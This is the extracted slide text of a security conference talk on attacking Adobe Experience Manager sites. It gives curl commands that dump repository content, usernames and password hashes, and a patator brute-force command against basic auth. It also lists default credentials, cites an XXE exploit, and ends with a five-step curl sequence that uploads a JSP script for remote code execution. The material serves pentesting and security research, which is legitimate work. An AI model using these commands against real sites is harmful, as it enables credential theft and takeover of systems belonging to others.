Доклад Михаила Егорова на phdays

Hack1ng Adobe Experience

Manager sites

• Mikhail Egorov

• Security researcher

• Works in Odin (Parallels)

• 0ang3el (at) gma1l (d0t) com

Who is that guy?

• http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/

• http://www.slideshare.net/CQCON/prsentation-ben-zahler

• https://docs.adobe.com/docs/en/aem/6-0/administer/security/security-checklist.html

Related Work

http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/

https://docs.adobe.com/docs/en/aem/6-0/administer/security/security-checklist.html

https://docs.adobe.com/docs/en/aem/6-0/administer/security/security-checklist.html

• Sensitive information from JCR

• Installed OSGI bundles

• Custom scripts

• Usernames

• Password hashes

• Elements that allow anonymous modification

What do we want

• Use JsonRendererServlet

Sensitive information from JCR

curl -X “GET” http://127.0.0.1:8080/.json

curl -X “GET” http://127.0.0.1:8080/.6.json

curl -X “GET” http://127.0.0.1:8080/.tidy.6.json

curl -X “GET” http://127.0.0.1:8080/.tidy.infinity.json

http://127.0.0.1:8080/.json

http://127.0.0.1:8080/.6.json

http://127.0.0.1:8080/.tidy.6.json

http://127.0.0.1:8080/.tidy.infinity.json

• List of all bundles

• QueryBuilder is your friend! http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html

Installed OSGI bundles

curl -X “GET” http://127.0.0.1:8080/bin.tidy.infinity.json

curl -X “GET” http://127.0.0.1:8080/bin/querybuilder.json

http://127.0.0.1:8080/bin.tidy.infinity.json

http://127.0.0.1:8080/bin.tidy.infinity.json

• List customs scripts

• List compiled custom scripts from cache

Custom scripts

curl -X “GET” http://127.0.0.1:8080/apps.tidy.infinity.json

curl -X “GET” http://127.0.0.1:8080/var/classes.tidy.infinity.json

http://127.0.0.1:8080/apps.tidy.infinity.json

http://127.0.0.1:8080/apps.tidy.infinity.json

• Dump content node properties

• Use regular expression to extract usernames (pipe with prev command)

Usernames

curl -X “GET” http://127.0.0.1:8080/content.infinity.json

python -c 'import sys,re; print "\n".join([m.group(1) for m in

re.finditer("\".+?By\":\"(.+?)\"",sys.stdin.readlines()[0])])' |

sort –u

http://127.0.0.1:8080/content.infinity.json

• Use QueryBuilder bundle

Password hashes

curl -X “GET”

http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=sel

ective&p.properties=rep:principalName%20rep:password&p.limit=100

http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName rep:password&p.limit=100

• Dump content node properties

• Use regular expression to check (pipe with prev command)

Anonymous modification

curl -X “GET” http://127.0.0.1:8080/content.infinity.json

python -c 'import sys,re; m =

re.search("\".+?By\":\"anonymous\"",sys.stdin.readlines()[0]); print

"Anon modification: ","Yes" if m else "No"'

http://127.0.0.1:8080/content.infinity.json

• Try default user credentials: admin/admin, author/author, anonymous/anonymous

• Offline attack (brute hashes)

• Online attack (POST servlet bundle)

Getting access

patator http_fuzz url=http://127.0.0.1:8080/content/fake.json

method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt

auth_type=basic -x ignore:code!=200 --threads 5

http://127.0.0.1:8080/content/fake.json

• XSS

• CSRF

• DoS

• Read local files

• RCE

You have access, now what?

Not covered, sorry!

• CVE-2015-1833 ( http://seclists.org/oss-sec/2015/q2/518 )

• Webdav OSGI bundle uses XML parser that is not properly initialized

• Exploit - https://www.exploit-db.com/exploits/37110/

Webdav bundle, XXE

http://seclists.org/oss-sec/2015/q2/518

https://www.exploit-db.com/exploits/37110/

• Out-of-bound exploitationhttp://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html

• Pros: works with anonymous credentials

• Cons: you need external server, instable

• Inbound exploitation• Pros: you do not need external server, more stable

• Cons: you need credentials of the user that is able to modify some node in JCR

Webdav bundle, XXE

http://www.youtube.com/watch?v=Hg3AXoG89Gs

Webdav bundle, XXE Demo

http://www.youtube.com/watch?v=Hg3AXoG89Gs

• We have node – http://127.0.0.1:8080/rce

• We have script exec.jsp that is magically loaded into node –http://127.0.0.1:8080/apps/rcetype

• When someone navigates to http://127.0.0.1:8080/rce.exec our exec.jsp will be executed.

Remote code execution

{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38

GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:crea

ted":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}

{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}

http://127.0.0.1:8080/rce

http://127.0.0.1:8080/apps/rcetype

http://127.0.0.1:8080/rce.exec

• Step I: Create rcetype node


curl –u admin:admin –Fjcr:primaryType=nt:folder

http://127.0.0.1:8080/content/rcetype


• Step II: Upload script exec.jsp to rcetype node


curl –u admin:admin –[email protected]



• Step III: Copy rcetype to /apps


curl –u admin:admin –F:operation=copy –F:dest=/apps/rcetype



• Step IV: Create rce node bound to rcetype


curl –u admin:admin –Fsling:resourceType=rcetype

http://127.0.0.1:8080/content/rce

http://127.0.0.1:8080/content/rce

• Step V: Launch jsp script


curl –X “GET” http://127.0.0.1:8080/content/rce.exec

http://127.0.0.1:8080/content/rce.exec

http://www.youtube.com/watch?v=Z9n2T07e6Ls

Remote code execution, Demo

http://www.youtube.com/watch?v=Z9n2T07e6Ls

Ask a Ninja

Доклад Михаила Егорова на phdays

Internet